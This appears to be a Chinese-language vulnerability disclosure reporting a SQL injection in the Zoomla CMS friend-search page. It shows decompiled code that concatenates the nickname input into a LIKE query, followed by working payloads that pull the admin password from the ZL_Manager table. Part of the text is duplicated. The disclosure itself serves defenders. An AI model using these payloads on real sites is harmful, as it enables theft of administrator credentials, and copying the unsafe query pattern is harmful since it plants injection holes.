### 简要描述: rt. ### 详细说明: 在线聊天功能都有,你敢信. 会员中心.在线聊天查找好友:http:demo.zoomla.cn/user/usertalk/SelectFrient.aspx,按昵称查找,注入点. ``` user/usertalk/SelectFrient.aspx <%@ page language="C#" autoeventwireup="true" validaterequest="false" inherits="User_Usertalk_SelectFrient, App_Web_ekn5n2xj" enableviewstatemac="false" enableEventValidation="false" viewStateEncryptionMode="Never" %> ``` ``` App_Web_ekn5n2xj.User_Usertalk_SelectFrient button1_Click() cll = this.bu.GetuserTbUserBase(DataConverter.CLng(this.SelectID.Text)); (按照ID查找处经过处理) cll = this.bu.GetuserTbUserBase(this.SelectName.Text); string cmdText = "SELECT * FROM " + strTableName + " WHERE 1=1"; if (!string.IsNullOrEmpty(strVal)) { cmdText = cmdText + " AND " + strField + " LIKE '%" + strVal + "%' "; return SqlHelper.ExecuteTable(CommandType.Text, cmdText, null); } ``` ### 漏洞证明: z%' and @@version>0 and '%'=' z%' and (select top 1 AdminPassword from ZL_Manager)>0 and '%'=' [<img...
### 简要描述: rt. ### 详细说明: 在线聊天功能都有,你敢信. 会员中心.在线聊天查找好友:http:demo.zoomla.cn/user/usertalk/SelectFrient.aspx,按昵称查找,注入点. ``` user/usertalk/SelectFrient.aspx <%@ page language="C#" autoeventwireup="true" validaterequest="false" inherits="User_Usertalk_SelectFrient, App_Web_ekn5n2xj" enableviewstatemac="false" enableEventValidation="false" viewStateEncryptionMode="Never" %> ``` ``` App_Web_ekn5n2xj.User_Usertalk_SelectFrient button1_Click() cll = this.bu.GetuserTbUserBase(DataConverter.CLng(this.SelectID.Text)); (按照ID查找处经过处理) cll = this.bu.GetuserTbUserBase(this.SelectName.Text); string cmdText = "SELECT * FROM " + strTableName + " WHERE 1=1"; if (!string.IsNullOrEmpty(strVal)) { cmdText = cmdText + " AND " + strField + " LIKE '%" + strVal + "%' "; return SqlHelper.ExecuteTable(CommandType.Text, cmdText, null); } ``` ### 漏洞证明: z%' and @@version>0 and '%'=' z%' and (select top 1 AdminPassword from ZL_Manager)>0 and '%'=' [<img src="https://images.seebug.org/upload/201408/021122452a7c76e01eb591390399b7bcbd5b8cb9.jpg" alt="080203.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/021122452a7c76e01eb591390399b7bcbd5b8cb9.jpg) [<img src="https://images.seebug.org/upload/201408/0211225838458dcd73db6ccd8c4b5f27975580c3.jpg" alt="080204.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/0211225838458dcd73db6ccd8c4b5f27975580c3.jpg)
